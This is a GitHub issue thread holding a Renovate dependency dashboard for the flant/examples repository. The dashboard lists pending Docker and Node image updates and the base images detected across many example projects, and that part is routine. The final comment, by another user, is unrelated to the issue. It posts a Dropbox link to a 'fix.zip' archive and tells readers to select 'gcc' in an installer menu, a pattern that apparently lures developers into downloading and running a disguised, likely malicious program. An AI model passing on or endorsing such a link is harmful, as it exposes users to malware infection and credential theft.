### ISSUE TITLE
Dependency Dashboard

### ISSUE THREAD

**Issue by alexey-igrychev** [flant/examples#181]
This issue lists Renovate updates and detected dependencies. Read the [Dependency Dashboard](https://docs.renovatebot.com/key-concepts/dashboard/) docs to learn more.

## Repository problems

Renovate tried to run on this repository, but found these problems.

 - WARN: Package lookup failures

## Rate-Limited

These updates are currently rate-limited. Click on a checkbox below to force their creation now.

 - [ ] Update Node.js to v20
 - [ ] Update ubuntu Docker tag to v24
 - [ ] 🔐 **Create all rate-limited PRs at once** 🔐

---

> [!WARNING]
> Renovate failed to look up the following dependencies: `Failed to look up docker package jboss/keycloak`.
> 
> Files affected: `2021/07-keycloak/werf.yaml`

---

## Open

These updates have all been created already. Click a checkbox below to force a retry/rebase of any.

 - [ ] [Pin dependencies](../pull/179) (`alpine`, `flant/shell-operator`, `golang`, `httpd`, `nginx`, `node`, `python`, `ubuntu`)
 - [ ] [Update python Docker tag to v3.7.6](../pull/180)
 - [ ] [Update golang Docker tag to v1.23](../pull/182)
 - [ ] [Update nginx Docker tag to v1.27](../pull/183)
 - [ ] **Click on this checkbox to rebase all open PRs at once**

## Detected dependencies

<details><summary>dockerfile</summary>
<blockquote>

<details><summary>2019/08-k8s-python-operator/Dockerfile</summary>

 - `python 3.7.3-alpine3.9`

</details>

<details><summary>2019/09-http-bench/Dockerfile</summary>

 - `golang stretch`
 - `nginx 1.16`

</details>

<details><summary>2019/09-http-bench/Dockerfile.apache</summary>

 - `golang stretch`
 - `httpd 2.4`

</details>

<details><summary>2019/09-http-bench/Dockerfile.caddy</summary>

 - `golang stretch`
 - `ubuntu 18.04`

</details>

<details><summary>2020/04-configmaps/images/configmaps-demo/Dockerfile</summary>

 - `golang 1.13-alpine`

</details>

<details><summary>2020/08-kubecon/container/Dockerfile</summary>

 - `flant/shell-operator v1.0.0-beta.12-alpine3.11`

</details>

<details><summary>2022/01-werf-local-dev/Dockerfile</summary>

 - `node 12-alpine`
 - `node 12-alpine`
 - `nginx stable-alpine`

</details>

<details><summary>2022/06-okteto/Dockerfile</summary>

 - `golang buster`

</details>

<details><summary>2022/06-werf-kube-run/Dockerfile</summary>

 - `golang 1.18-alpine`

</details>

<details><summary>2022/06-werf-nodejs/01_basic_app/Dockerfile</summary>

 - `node 12-alpine`

</details>

<details><summary>2022/06-werf-nodejs/020_assets/Dockerfile</summary>

 - `node 12-alpine`
 - `node 12-alpine`
 - `nginx stable-alpine`

</details>

<details><summary>2022/06-werf-nodejs/030_db/Dockerfile</summary>

 - `node 12-alpine`
 - `node 12-alpine`
 - `nginx stable-alpine`

</details>

<details><summary>2022/06-werf-nodejs/040_s3/Dockerfile</summary>

 - `node 12-alpine`
 - `node 12-alpine`
 - `nginx stable-alpine`

</details>

<details><summary>2023/08-deckhouse-werf/Dockerfile</summary>

 - `golang 1.18-alpine`
 - `alpine latest`

</details>

<details><summary>2023/08-werf-local-dev/backend/Dockerfile</summary>

 - `golang 1.18-alpine`
 - `alpine latest`

</details>

<details><summary>2023/08-werf-local-dev/frontend/Dockerfile</summary>

 - `node lts-alpine`
 - `nginx stable-alpine`

</details>

<details><summary>2023/11-github-actions/backend/Dockerfile</summary>

 - `golang 1.18-alpine`
 - `alpine latest`

</details>

<details><summary>2023/11-github-actions/frontend/Dockerfile</summary>

 - `node lts-alpine`
 - `nginx stable-alpine`

</details>

<details><summary>2024/01-werf-deckhouse-gitlab/backend/Dockerfile</summary>

 - `golang 1.18-alpine`
 - `alpine latest`

</details>

<details><summary>2024/01-werf-deckhouse-gitlab/frontend/Dockerfile</summary>

 - `node lts-alpine`
 - `nginx stable-alpine`

</details>

<details><summary>2024/03-github-actions/backend/Dockerfile</summary>

 - `golang 1.18-alpine`
 - `alpine latest`

</details>

<details><summary>2024/03-github-actions/frontend/Dockerfile</summary>

 - `node lts-alpine`
 - `nginx stable-alpine`

</details>

</blockquote>
</details>

<details><summary>regex</summary>
<blockquote>

<details><summary>2019/10-remote-syslog/werf.yaml</summary>

 - `ubuntu 16.04`
 - `ubuntu 16.04`

</details>

<details><summary>2021/07-keycloak/werf.yaml</summary>

 - `alpine 3.12`
 - `jboss/keycloak 12.0.4`
 - `infinispan/server 12.0`

</details>

<details><summary>2021/09-memcached-mcrouter/werf.yaml</summary>

 - `memcached 1.6.8`
 - `quay.io/prometheus/memcached-exporter v0.8.0`
 - `ubuntu 18.04`
 - `ubuntu 18.04`

</details>

<details><summary>2022/01-werf-local-dev/werf.yaml</summary>

 - `node 12-alpine`
 - `node 12-alpine`
 - `mysql 5.7`

</details>

<details><summary>2022/10-canary-example/werf.yaml</summary>

</details>

<details><summary>2022/12-netflow/werf.yaml</summary>

 - `golang 1.18-buster`
 - `python 3.8-slim-buster`

</details>

</blockquote>
</details>

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
